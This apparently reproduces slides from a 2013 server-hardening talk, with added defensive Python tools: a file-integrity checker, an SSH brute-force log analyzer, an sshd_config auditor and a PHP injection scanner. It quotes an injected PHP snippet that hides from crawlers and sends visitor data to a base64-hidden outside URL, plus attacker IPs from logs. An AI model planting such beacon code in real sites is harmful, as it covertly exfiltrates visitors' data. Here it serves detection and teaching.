Tonimir Kišasondi, mag.inf, EUCIP
Laboratory for Open Systems and Security
Faculty of Organization and Informatics, Varaždin

# nmap -A tkisason.foi.hr

nmap scan report for tkisason.foi.hr
Host is up (0.00033s latency).
Not shown: 970 closed ports, 27 filtered ports
PORT STATE SERVICE VERSION
Security, Crypto, Open Systems
kisasondi@gmail.com
twitter: @kisasondi
Skype: tkisason
Open Systems and Security Lab
Faculty of Organization and Informatics, Varaždin
$ ls ~/talks/dorscluc2013

Don't talk about security, make a data science talk
Crypto!
HC security topic
Let me just show some tips and tricks everyone should and can do

Exposure
You need to plug every hole in your system.
Your attackers only need to find one hole.
Trends:
Automated scanners / script kiddie hack tools keep getting better and more effective
Remember there is a black market for that stuff
Script kiddies are actually trying to learn something. Watering hole exploits / Client side exploits.
Please, kill Java
Contamination:
You spread your fail to other hosts. What happens when you are a little web dev company and you have 94 vhosts on a single machine?
Most are WordPress
Most have misc (read: outdated) plugins
A lot of custom PHP code (OWASP? What's that?)
System isn't managed
No security review / practice / vuln tracking
No jailing / compartmentalization
Tip #1
Don't wait for a compromise to happen. Set up your infrastructure early. Prepare your system for the worst.
Hardening / security services
Logging / log mirroring
Backups
Be proactive (WAF, IDS, IPS, SIEM)
Off-site or offline config/source backups from a trusted source?
Example: Linux/Cdorked.A
Patched Apache, nginx, lighttpd binary
They also set the binary to be immutable. Thanks!
No other "weird" files on disk Evil Apache loads some injections into requested pages:
http://894651446c103f0e.after1201.com
Tip #2
If you don't use rkhunter and chkrootkit... start using a HIDS. I like OSSEC:
File integrity checking (AIDE; debsums; rpm --verify)
Log monitoring (petit / splunk / logstash)
Rootkit detection (rkhunter / chkrootkit)
Active response (fail2ban)
No packaging :/
Useless if you don't monitor its logs. Use AnaLogi, use ANY log monitoring tool!
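What the file-integrity part of a HIDS actually does, as an added example that is not from the talk and not OSSEC's or AIDE's own code: record a digest plus size and mode for every regular file under a root, store that baseline somewhere the host cannot rewrite it, and later diff a fresh snapshot against it. A server binary patched in place, as in the Cdorked case above, keeps its path and name but changes its digest, so it surfaces as "modified". The directory tree and file contents in the demo are constructed; the paths mimic a Debian-style Apache install but nothing is read from the real system.

```python
"""Minimal file-integrity baseline in the spirit of AIDE / debsums (added example).

Builds a baseline of SHA-256 digests, sizes and modes for every regular file
under a root, then compares a later snapshot against it and reports files that
were added, removed or modified. The directory tree and contents in demo()
are constructed for the demonstration.
"""
import hashlib
import os
import stat
import tempfile
from pathlib import Path


def file_record(path: Path) -> dict:
    """Digest plus the metadata a trojaned binary is least able to keep unchanged."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    st = path.lstat()
    return {"sha256": h.hexdigest(), "size": st.st_size, "mode": stat.S_IMODE(st.st_mode)}


def build_baseline(root: str) -> dict:
    """Map of relative path -> record for every regular file under root."""
    baseline = {}
    root_path = Path(root)
    for dirpath, _dirs, files in os.walk(root_path):
        for name in files:
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue  # real tools track symlinks and devices too; skipped here
            baseline[str(p.relative_to(root_path))] = file_record(p)
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Return added / removed / modified relative paths, each sorted."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> dict:
    """Constructed scenario: take a baseline, then swap a binary and drop a module."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "usr/sbin").mkdir(parents=True)
        (root / "etc/apache2").mkdir(parents=True)
        (root / "usr/sbin/apache2").write_bytes(b"\x7fELF original httpd")
        (root / "etc/apache2/apache2.conf").write_text("ServerTokens Prod\n")
        before = build_baseline(tmp)

        # Simulate the binary being replaced in place and a new module appearing;
        # the configuration stays untouched, so it must not be reported.
        (root / "usr/sbin/apache2").write_bytes(b"\x7fELF backdoored httpd")
        (root / "usr/sbin/mod_evil.so").write_bytes(b"\x7fELF injected module")
        after = build_baseline(tmp)
        return compare(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

The baseline is only worth something if the attacker cannot edit it along with the binary, which is why the talk pairs this with off-host logging and offline backups: write the baseline to a read-only or remote location, and run the comparison from a trusted host or boot medium when you suspect a compromise.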
Failed password for root from 209.92.176.41 port 46864 ssh2
Failed password for root from 209.92.176.41 port 49866 ssh2
Failed password for root from 209.92.176.41 port 53300 ssh2
Failed password for root from 209.92.176.41 port 55774 ssh2
Failed password for root from 209.92.176.41 port 59157 ssh2
Failed password for root from 209.92.176.41 port 33723 ssh2
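The kind of log monitoring the slide asks for, as an added example that is not from the talk and not OSSEC's or fail2ban's own code: parse sshd's "Failed password" lines, count failures per source address, and report sources over a threshold. It goes a little beyond the lines above by also separating "invalid user" attempts (accounts that do not exist, the wordlist pattern shown under Tip #3) from attempts against real accounts. The sample log is constructed after the patterns on these slides; the timestamps, hostname and PIDs are invented, the addresses are the ones shown.

```python
"""Detect SSH password brute-forcing from auth.log-style lines (added example).

Parses sshd's "Failed password for ..." messages, counts failures per source
address and reports sources that cross a threshold, noting separately the
"invalid user" attempts (usernames that do not exist on the host). The sample
log below is constructed after the patterns on the slides.
"""
import re
import sys
from collections import Counter, defaultdict

# sshd's message; the "invalid user " prefix is present when the account does not exist.
FAILED_RE = re.compile(
    r"Failed password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+) ssh2"
)

SAMPLE_LOG = """\
May 12 10:01:02 web1 sshd[2101]: Failed password for root from 209.92.176.41 port 46864 ssh2
May 12 10:01:05 web1 sshd[2103]: Failed password for root from 209.92.176.41 port 49866 ssh2
May 12 10:01:09 web1 sshd[2105]: Failed password for root from 209.92.176.41 port 53300 ssh2
May 12 10:01:13 web1 sshd[2107]: Failed password for root from 209.92.176.41 port 55774 ssh2
May 12 10:02:20 web1 sshd[2201]: Failed password for invalid user 2012eduworld2 from 83.212.118.74 port 58186 ssh2
May 12 10:02:24 web1 sshd[2203]: Failed password for invalid user dna1admin from 83.212.118.74 port 51229 ssh2
May 12 10:02:28 web1 sshd[2205]: Failed password for invalid user bkalle from 83.212.118.74 port 58501 ssh2
May 12 10:05:00 web1 sshd[2301]: Failed password for alice from 10.0.0.7 port 40000 ssh2
May 12 10:05:30 web1 sshd[2303]: Accepted publickey for alice from 10.0.0.7 port 40001 ssh2
"""


def parse_failures(lines):
    """Yield (ip, user, is_invalid_user) for every failed-password line."""
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            yield m.group("ip"), m.group("user"), m.group("invalid") is not None


def summarize(lines, threshold=3):
    """Per-source failure counts; 'offenders' are sources at or over the threshold."""
    failures = Counter()
    invalid_users = defaultdict(set)   # usernames that do not exist, per source
    existing_users = defaultdict(set)  # real accounts being guessed, per source
    for ip, user, invalid in parse_failures(lines):
        failures[ip] += 1
        (invalid_users if invalid else existing_users)[ip].add(user)
    offenders = {
        ip: {
            "failures": n,
            "invalid_users": sorted(invalid_users[ip]),
            "existing_users": sorted(existing_users[ip]),
        }
        for ip, n in failures.items()
        if n >= threshold
    }
    return {"failures": dict(failures), "offenders": offenders}


if __name__ == "__main__":
    # Pass a real auth.log path to analyse it; with no argument the constructed sample is used.
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    for ip, info in summarize(source)["offenders"].items():
        print(ip, info)
```

A single real account failing once is noise; one address cycling through dozens of non-existent usernames is a wordlist, and that is the event to alert on and feed to an active response such as fail2ban. The threshold here is deliberately low for the demo; on a real host, tune it and add a time window so a user who mistypes a password three times in a week is not reported.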
Tip #3
I don't even want to talk about password security. Use ssh keys for remote login, disable password-based auth and remote root logins in sshd_config, use sudo for local root access. If you have a multi-user system, avoid contamination. A root pw of 123456 doesn't help! Watch out for file permissions!

Failed password for invalid user 2012eduworld2 from 83.212.118.74 port 58186 ssh2
Failed password for invalid user perfectpond.org from 83.212.118.74 port 59810 ssh2
Failed password for invalid user dna1admin from 83.212.118.74 port 51229 ssh2
Failed password for invalid user langliguo from 83.212.118.74 port 53687 ssh2
Failed password for invalid user bkalle from 83.212.118.74 port 58501 ssh2
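A check for the sshd settings Tip #3 asks for, as an added example that is not from the talk: parse an sshd_config and report whether password authentication and remote root login are off and public-key authentication is on. The caveat it encodes is one that bites in practice: sshd uses the first value it reads for a keyword, so hardening lines appended to the end of the file do nothing when an earlier line already set the keyword. Match blocks are out of scope and everything after the first "Match" is ignored. The two sample configurations are constructed.

```python
"""Audit an sshd_config against the settings in Tip #3 (added example).

Reports deviations from: PasswordAuthentication no, PermitRootLogin no,
PubkeyAuthentication yes. sshd keeps the FIRST value it reads for a keyword,
so the checker does the same and points out later, ignored values. Lines
after the first "Match" are conditional and are not evaluated here.
"""
import re

# keyword (lowercased) -> (wanted value, must be set explicitly)
WANTED = {
    "passwordauthentication": ("no", True),
    "permitrootlogin": ("no", True),
    "pubkeyauthentication": ("yes", False),  # OpenSSH's default is already yes
}

HARDENED = """\
# constructed sample: what Tip #3 asks for
Port 22
PubkeyAuthentication yes
PasswordAuthentication no
PermitRootLogin no
"""

LOOKS_HARDENED_BUT_ISNT = """\
# constructed sample: the right lines were appended at the bottom, but the
# keywords were already set above and sshd keeps the first value it reads
PasswordAuthentication yes
PermitRootLogin yes
Subsystem sftp /usr/lib/openssh/sftp-server
PasswordAuthentication no
PermitRootLogin no
"""


def parse_sshd_config(text: str) -> dict:
    """keyword -> (effective value, every value seen in order); first value wins."""
    seen = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break  # conditional block: needs per-connection evaluation, stop here
        seen.setdefault(key, []).append(value)
    return {k: (vals[0], vals) for k, vals in seen.items()}


def audit(text: str) -> list:
    """Findings as strings; an empty list means the three settings are as wanted."""
    cfg = parse_sshd_config(text)
    findings = []
    for key, (want, explicit) in WANTED.items():
        if key not in cfg:
            if explicit:
                findings.append(f"{key}: not set, the build default applies; set '{key} {want}'")
            continue
        effective, seen = cfg[key]
        if effective.lower() != want:
            msg = f"{key}: effective value '{effective}', want '{want}'"
            if len(seen) > 1:
                msg += f" (later value(s) {seen[1:]} are ignored; first match wins)"
            findings.append(msg)
    return findings


if __name__ == "__main__":
    for name, text in (("hardened", HARDENED), ("looks hardened", LOOKS_HARDENED_BUT_ISNT)):
        print(name, "->", audit(text) or "OK")
```

To check the running daemon rather than a file, `sshd -T` prints the effective configuration after all includes and defaults are resolved, and its output parses with the same function. Either way, test from a second session before closing the one you are in, because a typo in sshd_config locks you out as reliably as it locks out the attacker.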
// Injected snippet as reproduced on the slide: hides from crawler and browser user agents,
// then beacons the visitor's IP, user agent, host and path to a base64-hidden URL
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if ((strstr($sUserAgent, 'google') == false) AND (strstr($sUserAgent, 'yahoo') == false)
    AND (strstr($sUserAgent, 'baidu') == false) AND (strstr($sUserAgent, 'msn') == false)
    AND (strstr($sUserAgent, 'opera') == false) AND (strstr($sUserAgent, 'chrome') == false)
    AND (strstr($sUserAgent, 'bing') == false) AND (strstr($sUserAgent, 'safari') == false)
    AND (strstr($sUserAgent, 'bot') == false)) // Bot comes
{
    if(isset($_SERVER['REMOTE_ADDR']) == true AND isset($_SERVER['HTTP_HOST']) == true) {
        // Create bot analitics
        $stCurlLink = base64_decode('aHR0cDovL2dsb2JhbGJyb3dzZXJzdGF0aXN0aWMuY29tL3N0YXRGL3N0YXQucGhw')
            .'?ip='.urlencode($_SERVER['REMOTE_ADDR'])
            .'&useragent='.urlencode($sUserAgent)
            .'&domainname='.urlencode($_SERVER['HTTP_HOST'])
            .'&fullpath='.urlencode($_SERVER['REQUEST_URI'])
            .'&check='.isset($_GET['look']);
        $stCurlHandle = curl_init( $stCurlLink );
    }
}
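A scanner for the two indicators that snippet shows, as an added example that is not from the talk and not any product's own code: it decodes every base64_decode('...') string literal in a PHP file and reports the ones that hide a URL, and it flags files that branch on HTTP_USER_AGENT against a list of crawler names, the cloaking pattern that serves one page to search engines and another to visitors. The PHP samples are constructed; the base64 literal in the first is the one from the snippet, written with a line break inside it, which PHP's non-strict base64_decode tolerates and the scanner therefore strips as well. It is a heuristic for triage of 94 vhosts worth of custom PHP, not a substitute for reviewing the hits.

```python
"""Triage PHP sources for the indicators seen in the injected snippet (added example).

Heuristic 1: base64_decode('...') literals that decode to a URL. Legitimate code
has little reason to obfuscate a beacon address.
Heuristic 2: strstr() checks of the user agent against several crawler names,
the cloaking pattern that hides injected content from search engines.
The PHP below is constructed for the demonstration.
"""
import base64
import binascii
import re

B64_LITERAL_RE = re.compile(r"""base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")
CRAWLER_NAMES = ("google", "yahoo", "baidu", "msn", "bing", "bot")

SAMPLE_PHP = r"""<?php
// constructed sample modelled on the injected code
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if ((strstr($sUserAgent, 'google') == false) AND (strstr($sUserAgent, 'yahoo') == false)
    AND (strstr($sUserAgent, 'baidu') == false) AND (strstr($sUserAgent, 'bot') == false)) {
    $stCurlLink = base64_decode('aHR0cDovL2dsb2JhbGJyb3dzZXJzdGF0aXN0aWMuY29tL3N0YXRG
L3N0YXQucGhw') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']);
    $stCurlHandle = curl_init($stCurlLink);
}
"""

CLEAN_PHP = r"""<?php
// constructed sample: a base64 literal that is not a URL, and a plain UA echo
$png = base64_decode('iVBORw0KGgo=');
echo htmlspecialchars($_SERVER['HTTP_USER_AGENT']);
"""


def decode_literal(literal: str):
    """Decode a PHP base64 literal; whitespace is dropped first, as PHP's non-strict decode does."""
    compact = re.sub(r"\s+", "", literal)
    try:
        return base64.b64decode(compact, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def crawler_checks(source: str) -> list:
    """Crawler names the source compares the user agent against with strstr()."""
    found = []
    for name in CRAWLER_NAMES:
        pattern = r"strstr\s*\(\s*\$\w+\s*,\s*['\"]%s['\"]" % re.escape(name)
        if re.search(pattern, source):
            found.append(name)
    return found


def scan_php(source: str) -> list:
    """Findings as dicts with 'type' and 'value'; empty list means nothing suspicious."""
    findings = []
    for m in B64_LITERAL_RE.finditer(source):
        decoded = decode_literal(m.group(2))
        if decoded and re.match(r"https?://", decoded):
            findings.append({"type": "hidden_url", "value": decoded})
    if "HTTP_USER_AGENT" in source:
        names = crawler_checks(source)
        if len(names) >= 3:  # one check is common; a whole list of crawlers is cloaking
            findings.append({"type": "crawler_cloaking", "value": names})
    return findings


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_PHP), ("clean", CLEAN_PHP)):
        print(label, "->", scan_php(src) or "no findings")
```

Run it over the document roots of every vhost and diff the hit list against the last run; on a shared host the injection usually lands in many sites at once, so a sudden cluster of new hidden URLs across vhosts is the contamination from the earlier slide made visible.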
Targeting
Attacks are getting more and more targeted
Password reuse is the norm
Attackers don't want to seed their exploit to a host that's not vulnerable
Better evasion options
Do you have HIDS / NIDS / SIEM?
Train your people!
Good baselines:
NSA-IA Mitigation guidance:
http://www.nsa.gov/ia/mitigation_guidance/index.shtml
OWASP:
www.owasp.org
www.google.com
Webservers
Disable all HTTP methods you don't use (TRACE, OPTIONS, HEAD...?)
Watch out!
Use mod_security
LXC is easy, try to separate your services as much as possible
It does have some problems (iptables conntrack). They can be fixed easily.
end rant
I hope this talk will be useful to you. Educate yourself and your users, at least that isn't difficult. Prepare your systems, harden them while you still can.
Questions?
twitter: @kisasondi
Thank you